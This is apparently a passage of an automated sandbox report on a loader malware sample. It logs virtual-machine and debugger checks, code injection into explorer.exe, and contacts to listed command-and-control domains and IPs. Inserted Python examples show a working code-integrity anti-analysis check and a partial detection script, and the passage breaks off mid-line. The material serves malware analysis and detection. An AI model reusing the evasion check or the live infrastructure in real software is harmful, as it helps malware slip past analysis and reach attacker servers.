Source: C:\Users\user\AppData\Local\Temp\411F.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\explorer.exe TID: 6804 | Thread sleep count: 602 > 30
Source: C:\Windows\explorer.exe TID: 5408 | Thread sleep count: 386 > 30
Source: C:\Windows\explorer.exe TID: 5408 | Thread sleep time: -38600s >= -30000s
Source: C:\Windows\explorer.exe TID: 6648 | Thread sleep count: 485 > 30
Source: C:\Windows\explorer.exe TID: 6648 | Thread sleep time: -48500s >= -30000s
Source: C:\Windows\explorer.exe TID: 1576 | Thread sleep count: 482 > 30
Source: C:\Windows\explorer.exe TID: 6036 | Thread sleep count: 398 > 30
Source: C:\Windows\explorer.exe TID: 6036 | Thread sleep time: -39800s >= -30000s
Source: C:\Windows\explorer.exe TID: 6292 | Thread sleep count: 279 > 30
Source: C:\Users\user\AppData\Local\Temp\411F.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 602
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 386
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 485
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 482
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 398
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA,
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe | System information queried: ModuleInformation
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.688084068.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.695671128.000000000FCE0000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$
Source: explorer.exe, 00000005.00000000.687195483.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.726841267.000000000A783000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

            Anti Debugging:

            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe System information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\eveggtb System information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00845BDC push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\eveggtb Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\411F.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_004027ED LdrLoadDll,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0042C6D0 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_004283B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
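What the "CodeIntegrityInformation" query in the evidence above gives a program, as an added example that is not code from the report or from the sample: it decodes the CodeIntegrityOptions bitmask returned by NtQuerySystemInformation(SystemCodeIntegrityInformation), applies the heuristic malware commonly derives from it (test-signing or kernel debug mode switched on suggests a kernel debugger or an instrumented VM), and, on Windows only, performs the live query through ctypes. The flag values are the CODEINTEGRITY_OPTION_* constants from winnt.h and the information class value is 103; reading the result as an anti-analysis check is an assumption about how this sample uses it, not something the report states.

```python
"""Decode the CodeIntegrityOptions mask behind the CodeIntegrityInformation
query and apply the usual anti-analysis reading of it.  Added example, not
Joe Sandbox or SmokeLoader code."""
import ctypes
import sys

SystemCodeIntegrityInformation = 103  # SYSTEM_INFORMATION_CLASS value

# CODEINTEGRITY_OPTION_* bits as defined in winnt.h.
CODEINTEGRITY_OPTIONS = {
    0x0001: "ENABLED",
    0x0002: "TESTSIGN",
    0x0004: "UMCI_ENABLED",
    0x0008: "UMCI_AUDITMODE_ENABLED",
    0x0010: "UMCI_EXCLUSIONPATHS_ENABLED",
    0x0020: "TEST_BUILD",
    0x0040: "PREPRODUCTION_BUILD",
    0x0080: "DEBUGMODE_ENABLED",
    0x0100: "FLIGHT_BUILD",
    0x0200: "FLIGHTING_ENABLED",
    0x0400: "HVCI_KMCI_ENABLED",
    0x0800: "HVCI_KMCI_AUDITMODE_ENABLED",
    0x1000: "HVCI_KMCI_STRICTMODE_ENABLED",
    0x2000: "HVCI_IUM_ENABLED",
}

# Assumption: the bits a loader treats as "someone is debugging this box".
ANALYSIS_HINTS = 0x0002 | 0x0080  # TESTSIGN | DEBUGMODE_ENABLED


def decode_options(mask):
    """Names of the set CODEINTEGRITY_OPTION_* bits, lowest bit first."""
    return [name for bit, name in sorted(CODEINTEGRITY_OPTIONS.items()) if mask & bit]


def looks_instrumented(mask):
    """True when test-signing or kernel debug mode is enabled."""
    return bool(mask & ANALYSIS_HINTS)


def query_code_integrity():
    """Live NtQuerySystemInformation call; returns the raw mask, or None where
    the query cannot be made (non-Windows host or failing NTSTATUS)."""
    if sys.platform != "win32":
        return None

    class SYSTEM_CODEINTEGRITY_INFORMATION(ctypes.Structure):
        _fields_ = [("Length", ctypes.c_ulong),
                    ("CodeIntegrityOptions", ctypes.c_ulong)]

    info = SYSTEM_CODEINTEGRITY_INFORMATION(
        ctypes.sizeof(SYSTEM_CODEINTEGRITY_INFORMATION), 0)
    ret_len = ctypes.c_ulong(0)
    status = ctypes.WinDLL("ntdll").NtQuerySystemInformation(
        SystemCodeIntegrityInformation, ctypes.byref(info),
        ctypes.sizeof(info), ctypes.byref(ret_len))
    if status != 0:  # anything but STATUS_SUCCESS
        return None
    return info.CodeIntegrityOptions


if __name__ == "__main__":
    mask = query_code_integrity()
    if mask is None:
        print("query unavailable on this host; decoding a sample mask 0x83")
        mask = 0x83
    print(hex(mask), decode_options(mask),
          "instrumented" if looks_instrumented(mask) else "clean")
```

On an analysis VM the quick mitigation is the obvious one: do not leave test-signing or kernel debugging enabled on the guest unless the case needs it, since the sample will read that state before it reaches any instrumented API.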

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\explorer.exe File created: 411F.exe.5.dr
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe Domain query: unicupload.top
            Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
            Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
            Source: C:\Windows\explorer.exe Domain query: infinity-cheats.com
            Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
            Source: C:\Windows\explorer.exe Domain query: privacytools-foryou-777.com
            Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\eveggtb Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\eveggtb Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Thread created: C:\Windows\explorer.exe EIP: 4F41930
            Source: C:\Users\user\AppData\Roaming\eveggtb Thread created: unknown EIP: 4F91930
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
            Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
            Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
            Source: explorer.exe, 00000005.00000000.717104368.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.686588068.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.700174551.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Program Manager
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.721547751.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: explorer.exe, 00000005.00000000.692484311.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711003387.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,EnumSystemLocalesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
            Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
            Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,
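The evidence in this section (a remote thread created in explorer.exe, explorer.exe writing PE files under the user profile, and explorer.exe resolving and contacting the listed hosts) is what a detection rule for this family has to key on. The following triage routine is an added example, not Joe Sandbox or SmokeLoader code: it runs three such rules over endpoint telemetry. The EVENTS records are constructed in the shape of Sysmon event IDs 3 (network connection), 8 (CreateRemoteThread) and 11 (file create) and are not taken from the report's own logs; the indicator sets are copied from the report's domain and IP tables, and the user-profile path layout is assumed to be the default C:\Users one.

```python
"""Triage telemetry for the injected-explorer.exe behaviour this report records.
Added example, not Joe Sandbox or SmokeLoader code."""
import ipaddress
import re

# Network indicators from the report's Contacted Domains / IPs / URLs tables.
C2_DOMAINS = {
    "unicupload.top", "host-data-coin-11.com", "privacytools-foryou-777.com",
    "data-host-coin-8.com", "infinity-cheats.com", "file-coin-host-12.com",
}
C2_IPS = {"185.233.81.115", "47.251.11.252", "185.186.142.166", "54.38.220.85"}

# Assumption: default profile layout.  DROP_DIRS are where the report's files
# landed (%APPDATA% and %TEMP%); USER_PROFILE is anything under a user's home.
USER_PROFILE = re.compile(r"^c:\\users\\[^\\]+\\", re.I)
DROP_DIRS = re.compile(r"^c:\\users\\[^\\]+\\appdata\\(roaming|local\\temp)\\", re.I)


def is_explorer(image):
    return image.lower().endswith("\\explorer.exe")


def triage(events):
    """Return (rule, detail) findings, one per matching event, in input order."""
    findings = []
    for ev in events:
        if ev["id"] == 3 and is_explorer(ev["image"]):
            host = ev.get("dst_host", "").lower()
            if ev["dst_ip"] in C2_IPS or host in C2_DOMAINS:
                findings.append(("explorer_c2_contact", host or ev["dst_ip"]))
            elif not ipaddress.ip_address(ev["dst_ip"]).is_private:
                # explorer.exe does reach the internet on its own (tiles, CDNs),
                # so an unknown public destination is only a weak signal.
                findings.append(("explorer_external_connect", ev["dst_ip"]))
        elif (ev["id"] == 11 and is_explorer(ev["image"])
              and ev.get("magic") == "MZ" and DROP_DIRS.match(ev["path"])):
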